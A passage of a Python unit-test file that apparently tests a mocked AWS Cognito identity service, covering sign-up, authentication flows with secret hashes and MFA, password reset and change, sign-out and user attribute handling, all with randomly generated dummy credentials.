str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] user_attribute_name = str(uuid.uuid4()) user_attribute_value = str(uuid.uuid4()) client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), ReadAttributes=[user_attribute_name], GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up( ClientId=client_id, Username=username, Password=password, ) client_secret = conn.describe_user_pool_client( UserPoolId=user_pool_id, ClientId=client_id, )["UserPoolClient"]["ClientSecret"] conn.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456", ) # generating secret hash key = bytes(str(client_secret).encode("latin-1")) msg = bytes(str(username + client_id).encode("latin-1")) new_digest = hmac.new(key, msg, hashlib.sha256).digest() secret_hash = base64.b64encode(new_digest).decode() result = conn.initiate_auth( ClientId=client_id, AuthFlow="USER_SRP_AUTH", AuthParameters={ "USERNAME": username, "SRP_A": uuid.uuid4().hex, "SECRET_HASH": secret_hash, }, ) result = conn.respond_to_auth_challenge( ClientId=client_id, ChallengeName=result["ChallengeName"], ChallengeResponses={ "PASSWORD_CLAIM_SIGNATURE": str(uuid.uuid4()), "PASSWORD_CLAIM_SECRET_BLOCK": result["Session"], "TIMESTAMP": str(uuid.uuid4()), "USERNAME": username, }, ) refresh_token = result["AuthenticationResult"]["RefreshToken"] # add mfa token conn.associate_software_token( AccessToken=result["AuthenticationResult"]["AccessToken"], ) conn.verify_software_token( AccessToken=result["AuthenticationResult"]["AccessToken"], UserCode="123456", ) conn.set_user_mfa_preference( AccessToken=result["AuthenticationResult"]["AccessToken"], SoftwareTokenMfaSettings={"Enabled": True, "PreferredMfa": True,}, ) result = conn.initiate_auth( ClientId=client_id, AuthFlow="REFRESH_TOKEN", AuthParameters={"SECRET_HASH": secret_hash, "REFRESH_TOKEN": refresh_token,}, ) result["AuthenticationResult"]["IdToken"].should_not.be.none result["AuthenticationResult"]["AccessToken"].should_not.be.none # authenticate user once again this time with mfa token result = conn.initiate_auth( ClientId=client_id, AuthFlow="USER_SRP_AUTH", AuthParameters={ "USERNAME": username, "SRP_A": uuid.uuid4().hex, "SECRET_HASH": secret_hash, }, ) result = conn.respond_to_auth_challenge( ClientId=client_id, ChallengeName=result["ChallengeName"], ChallengeResponses={ "PASSWORD_CLAIM_SIGNATURE": str(uuid.uuid4()), "PASSWORD_CLAIM_SECRET_BLOCK": result["Session"], "TIMESTAMP": str(uuid.uuid4()), "USERNAME": username, }, ) result = conn.respond_to_auth_challenge( ClientId=client_id, Session=result["Session"], ChallengeName=result["ChallengeName"], ChallengeResponses={ "SOFTWARE_TOKEN_MFA_CODE": "123456", "USERNAME": username, "SECRET_HASH": secret_hash, }, ) return { "user_pool_id": user_pool_id, "client_id": client_id, "client_secret": client_secret, "secret_hash": secret_hash, "id_token": result["AuthenticationResult"]["IdToken"], "access_token": result["AuthenticationResult"]["AccessToken"], "refresh_token": refresh_token, "username": username, "password": password, "additional_fields": {user_attribute_name: user_attribute_value}, } @mock_cognitoidp def test_user_authentication_flow(): conn = boto3.client("cognito-idp", "us-west-2") user_authentication_flow(conn) @mock_cognitoidp def test_token_legitimacy(): conn = boto3.client("cognito-idp", "us-west-2") path = "../../moto/cognitoidp/resources/jwks-public.json" with open(os.path.join(os.path.dirname(__file__), path)) as f: json_web_key = json.loads(f.read())["keys"][0] for auth_flow in ["ADMIN_NO_SRP_AUTH", "ADMIN_USER_PASSWORD_AUTH"]: outputs = authentication_flow(conn, auth_flow) id_token = outputs["id_token"] access_token = outputs["access_token"] client_id = outputs["client_id"] issuer = "https://cognito-idp.us-west-2.amazonaws.com/{}".format( outputs["user_pool_id"] ) id_claims = json.loads(jws.verify(id_token, json_web_key, "RS256")) id_claims["iss"].should.equal(issuer) id_claims["aud"].should.equal(client_id) id_claims["token_use"].should.equal("id") for k, v in outputs["additional_fields"].items(): id_claims[k].should.equal(v) access_claims = json.loads(jws.verify(access_token, json_web_key, "RS256")) access_claims["iss"].should.equal(issuer) access_claims["aud"].should.equal(client_id) access_claims["token_use"].should.equal("access") @mock_cognitoidp def test_change_password(): conn = boto3.client("cognito-idp", "us-west-2") for auth_flow in ["ADMIN_NO_SRP_AUTH", "ADMIN_USER_PASSWORD_AUTH"]: outputs = authentication_flow(conn, auth_flow) # Take this opportunity to test change_password, which requires an access token. newer_password = str(uuid.uuid4()) conn.change_password( AccessToken=outputs["access_token"], PreviousPassword=outputs["password"], ProposedPassword=newer_password, ) # Log in again, which should succeed without a challenge because the user is no # longer in the force-new-password state. result = conn.admin_initiate_auth( UserPoolId=outputs["user_pool_id"], ClientId=outputs["client_id"], AuthFlow="ADMIN_NO_SRP_AUTH", AuthParameters={ "USERNAME": outputs["username"], "PASSWORD": newer_password, }, ) result["AuthenticationResult"].should_not.be.none @mock_cognitoidp def test_change_password__using_custom_user_agent_header(): # https://github.com/spulec/moto/issues/3098 # As the admin_initiate_auth-method is unauthenticated, we use the user-agent header to pass in the region # This test verifies this works, even if we pass in our own user-agent header from botocore.config import Config my_config = Config(user_agent_extra="more/info", signature_version="v4") conn = boto3.client("cognito-idp", "us-west-2", config=my_config) for auth_flow in ["ADMIN_NO_SRP_AUTH", "ADMIN_USER_PASSWORD_AUTH"]: outputs = authentication_flow(conn, auth_flow) # Take this opportunity to test change_password, which requires an access token. newer_password = str(uuid.uuid4()) conn.change_password( AccessToken=outputs["access_token"], PreviousPassword=outputs["password"], ProposedPassword=newer_password, ) # Log in again, which should succeed without a challenge because the user is no # longer in the force-new-password state. result = conn.admin_initiate_auth( UserPoolId=outputs["user_pool_id"], ClientId=outputs["client_id"], AuthFlow="ADMIN_NO_SRP_AUTH", AuthParameters={ "USERNAME": outputs["username"], "PASSWORD": newer_password, }, ) result["AuthenticationResult"].should_not.be.none @mock_cognitoidp def test_forgot_password(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] result = conn.forgot_password(ClientId=client_id, Username=str(uuid.uuid4())) result["CodeDeliveryDetails"]["Destination"].should.not_be.none result["CodeDeliveryDetails"]["DeliveryMedium"].should.equal("SMS") result["CodeDeliveryDetails"]["AttributeName"].should.equal("phone_number") @mock_cognitoidp def test_forgot_password_nonexistent_client_id(): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.forgot_password(ClientId=create_id(), Username=str(uuid.uuid4())) err = ex.value.response["Error"] err["Code"].should.equal("ResourceNotFoundException") err["Message"].should.equal("Username/client id combination not found.") @mock_cognitoidp def test_forgot_password_admin_only_recovery(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), AccountRecoverySetting={ "RecoveryMechanisms": [{"Name": "admin_only", "Priority": 1}] }, )["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] with pytest.raises(ClientError) as ex: conn.forgot_password(ClientId=client_id, Username=str(uuid.uuid4())) err = ex.value.response["Error"] err["Code"].should.equal("NotAuthorizedException") err["Message"].should.equal("Contact administrator to reset password.") @mock_cognitoidp def test_forgot_password_user_with_all_recovery_attributes(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), AccountRecoverySetting={ "RecoveryMechanisms": [{"Name": "verified_email", "Priority": 1}] }, )["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] username = str(uuid.uuid4()) conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[ {"Name": "email", "Value": "test@moto.com"}, {"Name": "phone_number", "Value": "555555555"}, ], ) result = conn.forgot_password(ClientId=client_id, Username=username) result["CodeDeliveryDetails"]["Destination"].should.equal("test@moto.com") result["CodeDeliveryDetails"]["DeliveryMedium"].should.equal("EMAIL") result["CodeDeliveryDetails"]["AttributeName"].should.equal("email") conn.update_user_pool( UserPoolId=user_pool_id, AccountRecoverySetting={ "RecoveryMechanisms": [{"Name": "verified_phone_number", "Priority": 1}] }, ) result = conn.forgot_password(ClientId=client_id, Username=username) result["CodeDeliveryDetails"]["Destination"].should.equal("555555555") result["CodeDeliveryDetails"]["DeliveryMedium"].should.equal("SMS") result["CodeDeliveryDetails"]["AttributeName"].should.equal("phone_number") @mock_cognitoidp def test_forgot_password_nonexistent_user_or_user_without_attributes(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), AccountRecoverySetting={ "RecoveryMechanisms": [{"Name": "verified_email", "Priority": 1}] }, )["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] user_without_attributes = str(uuid.uuid4()) nonexistent_user = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=user_without_attributes) for user in user_without_attributes, nonexistent_user: result = conn.forgot_password(ClientId=client_id, Username=user) result["CodeDeliveryDetails"]["Destination"].should.equal(user + "@h***.com") result["CodeDeliveryDetails"]["DeliveryMedium"].should.equal("EMAIL") result["CodeDeliveryDetails"]["AttributeName"].should.equal("email") conn.update_user_pool( UserPoolId=user_pool_id, AccountRecoverySetting={ "RecoveryMechanisms": [{"Name": "verified_phone_number", "Priority": 1}] }, ) for user in user_without_attributes, nonexistent_user: result = conn.forgot_password(ClientId=client_id, Username=user) result["CodeDeliveryDetails"]["Destination"].should.equal("+*******9934") result["CodeDeliveryDetails"]["DeliveryMedium"].should.equal("SMS") result["CodeDeliveryDetails"]["AttributeName"].should.equal("phone_number") @mock_cognitoidp def test_confirm_forgot_password_legacy(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=str(uuid.uuid4()) ) # Random confirmation code - opt out of verification conn.forgot_password(ClientId=client_id, Username=username) res = conn.confirm_forgot_password( ClientId=client_id, Username=username, ConfirmationCode=str(uuid.uuid4()), Password=str(uuid.uuid4()), ) res["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) @mock_cognitoidp def test_confirm_forgot_password_opt_in_verification(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=str(uuid.uuid4()) ) res = conn.forgot_password(ClientId=client_id, Username=username) confirmation_code = res["ResponseMetadata"]["HTTPHeaders"][ "x-moto-forgot-password-confirmation-code" ] confirmation_code.should.match(r"moto-confirmation-code:[0-9]{6}", re.I) res = conn.confirm_forgot_password( ClientId=client_id, Username=username, ConfirmationCode=confirmation_code, Password=str(uuid.uuid4()), ) res["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) @mock_cognitoidp def test_confirm_forgot_password_opt_in_verification_invalid_confirmation_code(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) )["UserPoolClient"]["ClientId"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, TemporaryPassword=str(uuid.uuid4()) ) with pytest.raises(ClientError) as ex: conn.confirm_forgot_password( ClientId=client_id, Username=username, ConfirmationCode="moto-confirmation-code:123invalid", Password=str(uuid.uuid4()), ) err = ex.value.response["Error"] err["Code"].should.equal("ExpiredCodeException") err["Message"].should.equal("Invalid code provided, please request a code again.") @mock_cognitoidp def test_admin_user_global_sign_out(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) conn.admin_user_global_sign_out( UserPoolId=result["user_pool_id"], Username=result["username"], ) with pytest.raises(ClientError) as ex: conn.initiate_auth( ClientId=result["client_id"], AuthFlow="REFRESH_TOKEN", AuthParameters={ "REFRESH_TOKEN": result["refresh_token"], "SECRET_HASH": result["secret_hash"], }, ) err = ex.value.response["Error"] err["Code"].should.equal("NotAuthorizedException") err["Message"].should.equal("Refresh Token has been revoked") @mock_cognitoidp def test_admin_user_global_sign_out_unknown_userpool(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) with pytest.raises(ClientError) as ex: conn.admin_user_global_sign_out( UserPoolId="n/a", Username=result["username"], ) err = ex.value.response["Error"] err["Code"].should.equal("ResourceNotFoundException") @mock_cognitoidp def test_admin_user_global_sign_out_unknown_user(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) with pytest.raises(ClientError) as ex: conn.admin_user_global_sign_out( UserPoolId=result["user_pool_id"], Username="n/a", ) err = ex.value.response["Error"] err["Code"].should.equal("UserNotFoundException") err["Message"].should.equal("User does not exist.") @mock_cognitoidp def test_admin_update_user_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[ {"Name": "family_name", "Value": "Doe"}, {"Name": "given_name", "Value": "John"}, ], ) conn.admin_update_user_attributes( UserPoolId=user_pool_id, Username=username, UserAttributes=[ {"Name": "family_name", "Value": "Doe"}, {"Name": "given_name", "Value": "Jane"}, ], ) user = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) attributes = user["UserAttributes"] attributes.should.be.a(list) for attr in attributes: val = attr["Value"] if attr["Name"] == "family_name": val.should.equal("Doe") elif attr["Name"] == "given_name": val.should.equal("Jane") @mock_cognitoidp def test_admin_delete_user_attributes(): conn = boto3.client("cognito-idp", "us-east-1") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ { "Name": "foo", "AttributeDataType": "String", "Mutable": True, "Required": False, } ], )["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[ {"Name": "family_name", "Value": "Doe"}, {"Name": "given_name", "Value": "John"}, {"Name": "nickname", "Value": "Joe"}, {"Name": "custom:foo", "Value": "bar"}, ], ) conn.admin_delete_user_attributes( UserPoolId=user_pool_id, Username=username, UserAttributeNames=["nickname", "custom:foo"], ) user = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) user["UserAttributes"].should.have.length_of(3) # family_name, given_name and sub user["UserAttributes"].should.contain({"Name": "family_name", "Value": "Doe"}) user["UserAttributes"].should.contain({"Name": "given_name", "Value": "John"}) user["UserAttributes"].should_not.contain({"Name": "nickname", "Value": "Joe"}) user["UserAttributes"].should_not.contain({"Name": "custom:foo", "Value": "bar"}) @mock_cognitoidp def test_admin_delete_user_attributes_non_existing_attribute(): conn = boto3.client("cognito-idp", "us-east-1") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[ {"Name": "family_name", "Value": "Doe"}, {"Name": "given_name", "Value": "John"}, {"Name": "nickname", "Value": "Joe"}, ], ) with pytest.raises(ClientError) as exc: conn.admin_delete_user_attributes( UserPoolId=user_pool_id, Username=username, UserAttributeNames=["nickname", "custom:foo"], ) err = exc.value.response["Error"] err["Code"].should.equal("InvalidParameterException") err["Message"].should.equal( "Invalid user attributes: user.custom:foo: Attribute does not exist in the schema.\n" ) @mock_cognitoidp def test_admin_delete_user_attributes_non_existing_user(): conn = boto3.client("cognito-idp", "us-east-1") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] with pytest.raises(ClientError) as exc: conn.admin_delete_user_attributes( UserPoolId=user_pool_id, Username=username, UserAttributeNames=["nickname", "custom:foo"], ) err = exc.value.response["Error"] err["Code"].should.equal("UserNotFoundException") err["Message"].should.equal("User does not exist.") @mock_cognitoidp def test_admin_delete_user_attributes_non_existing_pool(): conn = boto3.client("cognito-idp", "us-east-1") user_pool_id = "us-east-1_aaaaaaaa" with pytest.raises(ClientError) as exc: conn.admin_delete_user_attributes( UserPoolId=user_pool_id, Username=str(uuid.uuid4()), UserAttributeNames=["nickname"], ) err = exc.value.response["Error"] err["Code"].should.equal("ResourceNotFoundException") err["Message"].should.equal(f"User pool {user_pool_id} does not exist.") @mock_cognitoidp def test_resource_server(): client = boto3.client("cognito-idp", "us-west-2") name = str(uuid.uuid4()) res = client.create_user_pool(PoolName=name) user_pool_id = res["UserPool"]["Id"] identifier = "http://localhost.localdomain" name = "local server" scopes = [ {"ScopeName": "app:write", "ScopeDescription": "write scope"}, {"ScopeName": "app:read", "ScopeDescription": "read scope"}, ] res = client.create_resource_server( UserPoolId=user_pool_id, Identifier=identifier, Name=name, Scopes=scopes ) res["ResourceServer"]["UserPoolId"].should.equal(user_pool_id) res["ResourceServer"]["Identifier"].should.equal(identifier) res["ResourceServer"]["Name"].should.equal(name) res["ResourceServer"]["Scopes"].should.equal(scopes) with pytest.raises(ClientError) as ex: client.create_resource_server( UserPoolId=user_pool_id, Identifier=identifier, Name=name, Scopes=scopes ) ex.value.operation_name.should.equal("CreateResourceServer") ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( "%s already exists in user pool %s." % (identifier, user_pool_id) ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_sign_up(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), )["UserPoolClient"]["ClientId"] username = str(uuid.uuid4()) password = str(uuid.uuid4()) result = conn.sign_up(ClientId=client_id, Username=username, Password=password) result["UserConfirmed"].should.be.false result["UserSub"].should_not.be.none @mock_cognitoidp def test_sign_up_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email", "phone_number"] )["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), )["UserPoolClient"]["ClientId"] username = str(uuid.uuid4()) password = str(uuid.uuid4()) with pytest.raises(ClientError) as err: # Attempt to add user again result = conn.sign_up(ClientId=client_id, Username=username, Password=password) err.value.response["Error"]["Code"].should.equal("InvalidParameterException") username = "test@example.com" result = conn.sign_up(ClientId=client_id, Username=username, Password=password) result["UserConfirmed"].should.be.false result["UserSub"].should_not.be.none username = "+123456789" result = conn.sign_up(ClientId=client_id, Username=username, Password=password) result["UserConfirmed"].should.be.false result["UserSub"].should_not.be.none @mock_cognitoidp def test_sign_up_existing_user(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), )["UserPoolClient"]["ClientId"] username = str(uuid.uuid4()) password = str(uuid.uuid4()) # Add initial user conn.sign_up(ClientId=client_id, Username=username, Password=password) with pytest.raises(ClientError) as err: # Attempt to add user again conn.sign_up(ClientId=client_id, Username=username, Password=password) err.value.response["Error"]["Code"].should.equal("UsernameExistsException") @mock_cognitoidp def test_confirm_sign_up(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) conn.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456", ) result = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) result["UserStatus"].should.equal("CONFIRMED") @mock_cognitoidp def test_confirm_sign_up_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) conn.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456", ) result = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) result["UserStatus"].should.equal("CONFIRMED") @mock_cognitoidp def test_initiate_auth_USER_SRP_AUTH(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) client_secret = conn.describe_user_pool_client( UserPoolId=user_pool_id, ClientId=client_id, )["UserPoolClient"]["ClientSecret"] conn.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456", ) key = bytes(str(client_secret).encode("latin-1")) msg = bytes(str(username + client_id).encode("latin-1")) new_digest = hmac.new(key, msg, hashlib.sha256).digest() secret_hash = base64.b64encode(new_digest).decode() result = conn.initiate_auth( ClientId=client_id, AuthFlow="USER_SRP_AUTH", AuthParameters={ "USERNAME": username, "SRP_A": uuid.uuid4().hex, "SECRET_HASH": secret_hash, }, ) result["ChallengeName"].should.equal("PASSWORD_VERIFIER") @mock_cognitoidp def test_initiate_auth_USER_SRP_AUTH_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) client_secret = conn.describe_user_pool_client( UserPoolId=user_pool_id, ClientId=client_id, )["UserPoolClient"]["ClientSecret"] conn.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456", ) key = bytes(str(client_secret).encode("latin-1")) msg = bytes(str(username + client_id).encode("latin-1")) new_digest = hmac.new(key, msg, hashlib.sha256).digest() secret_hash = base64.b64encode(new_digest).decode() result = conn.initiate_auth( ClientId=client_id, AuthFlow="USER_SRP_AUTH", AuthParameters={ "USERNAME": username, "SRP_A": uuid.uuid4().hex, "SECRET_HASH": secret_hash, }, ) result["ChallengeName"].should.equal("PASSWORD_VERIFIER") @mock_cognitoidp def test_initiate_auth_REFRESH_TOKEN(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) result = conn.initiate_auth( ClientId=result["client_id"], AuthFlow="REFRESH_TOKEN", AuthParameters={ "REFRESH_TOKEN": result["refresh_token"], "SECRET_HASH": result["secret_hash"], }, ) result["AuthenticationResult"]["AccessToken"].should_not.be.none @mock_cognitoidp def test_initiate_auth_USER_PASSWORD_AUTH(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) result = conn.initiate_auth( ClientId=result["client_id"], AuthFlow="USER_PASSWORD_AUTH", AuthParameters={"USERNAME": result["username"], "PASSWORD": result["password"]}, ) result["AuthenticationResult"]["AccessToken"].should_not.be.none result["AuthenticationResult"]["IdToken"].should_not.be.none result["AuthenticationResult"]["RefreshToken"].should_not.be.none @mock_cognitoidp def test_initiate_auth_USER_PASSWORD_AUTH_user_not_found(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) with pytest.raises(ClientError) as ex: conn.initiate_auth( ClientId=result["client_id"], AuthFlow="USER_PASSWORD_AUTH", AuthParameters={"USERNAME": "INVALIDUSER", "PASSWORD": result["password"]}, ) err = ex.value.response["Error"] err["Code"].should.equal("UserNotFoundException") @mock_cognitoidp def test_initiate_auth_USER_PASSWORD_AUTH_user_incorrect_password(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) with pytest.raises(ClientError) as ex: conn.initiate_auth( ClientId=result["client_id"], AuthFlow="USER_PASSWORD_AUTH", AuthParameters={ "USERNAME": result["username"], "PASSWORD": "NotAuthorizedException", }, ) err = ex.value.response["Error"] err["Code"].should.equal("NotAuthorizedException") @mock_cognitoidp def test_initiate_auth_USER_PASSWORD_AUTH_unconfirmed_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) with pytest.raises(ClientError) as ex: conn.initiate_auth( ClientId=client_id, AuthFlow="USER_PASSWORD_AUTH", AuthParameters={"USERNAME": username, "PASSWORD": password}, ) err = ex.value.response["Error"] err["Code"].should.equal("UserNotConfirmedException") @mock_cognitoidp def test_initiate_auth_for_unconfirmed_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) client_secret = conn.describe_user_pool_client( UserPoolId=user_pool_id, ClientId=client_id, )["UserPoolClient"]["ClientSecret"] key = bytes(str(client_secret).encode("latin-1")) msg = bytes(str(username + client_id).encode("latin-1")) new_digest = hmac.new(key, msg, hashlib.sha256).digest() secret_hash = base64.b64encode(new_digest).decode() caught = False try: conn.initiate_auth( ClientId=client_id, AuthFlow="USER_SRP_AUTH", AuthParameters={ "USERNAME": username, "SRP_A": uuid.uuid4().hex, "SECRET_HASH": secret_hash, }, ) except conn.exceptions.UserNotConfirmedException: caught = True caught.should.be.true @mock_cognitoidp def test_initiate_auth_with_invalid_secret_hash(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) password = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=True, )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) conn.describe_user_pool_client(UserPoolId=user_pool_id, ClientId=client_id) conn.confirm_sign_up( ClientId=client_id, Username=username, ConfirmationCode="123456", ) invalid_secret_hash = str(uuid.uuid4()) caught = False try: conn.initiate_auth( ClientId=client_id, AuthFlow="USER_SRP_AUTH", AuthParameters={ "USERNAME": username, "SRP_A": uuid.uuid4().hex, "SECRET_HASH": invalid_secret_hash, }, ) except conn.exceptions.NotAuthorizedException: caught = True caught.should.be.true @mock_cognitoidp def test_setting_mfa(): conn = boto3.client("cognito-idp", "us-west-2") for auth_flow in ["ADMIN_NO_SRP_AUTH", "ADMIN_USER_PASSWORD_AUTH"]: result = authentication_flow(conn, auth_flow) conn.associate_software_token(AccessToken=result["access_token"]) conn.verify_software_token( AccessToken=result["access_token"], UserCode="123456" ) conn.set_user_mfa_preference( AccessToken=result["access_token"], SoftwareTokenMfaSettings={"Enabled": True, "PreferredMfa": True}, ) result = conn.admin_get_user( UserPoolId=result["user_pool_id"], Username=result["username"] ) result["UserMFASettingList"].should.have.length_of(1) @mock_cognitoidp def test_setting_mfa_when_token_not_verified(): conn = boto3.client("cognito-idp", "us-west-2") for auth_flow in ["ADMIN_NO_SRP_AUTH", "ADMIN_USER_PASSWORD_AUTH"]: result = authentication_flow(conn, auth_flow) conn.associate_software_token(AccessToken=result["access_token"]) caught = False try: conn.set_user_mfa_preference( AccessToken=result["access_token"], SoftwareTokenMfaSettings={"Enabled": True, "PreferredMfa": True}, ) except conn.exceptions.InvalidParameterException: caught = True caught.should.be.true @mock_cognitoidp def test_respond_to_auth_challenge_with_invalid_secret_hash(): conn = boto3.client("cognito-idp", "us-west-2") result = user_authentication_flow(conn) valid_secret_hash = result["secret_hash"] invalid_secret_hash = str(uuid.uuid4()) challenge = conn.initiate_auth( ClientId=result["client_id"], AuthFlow="USER_SRP_AUTH", AuthParameters={ "USERNAME": result["username"], "SRP_A": uuid.uuid4().hex, "SECRET_HASH": valid_secret_hash, }, ) challenge = conn.respond_to_auth_challenge( ClientId=result["client_id"], ChallengeName=challenge["ChallengeName"], ChallengeResponses={ "PASSWORD_CLAIM_SIGNATURE": str(uuid.uuid4()), "PASSWORD_CLAIM_SECRET_BLOCK": challenge["Session"], "TIMESTAMP": str(uuid.uuid4()), 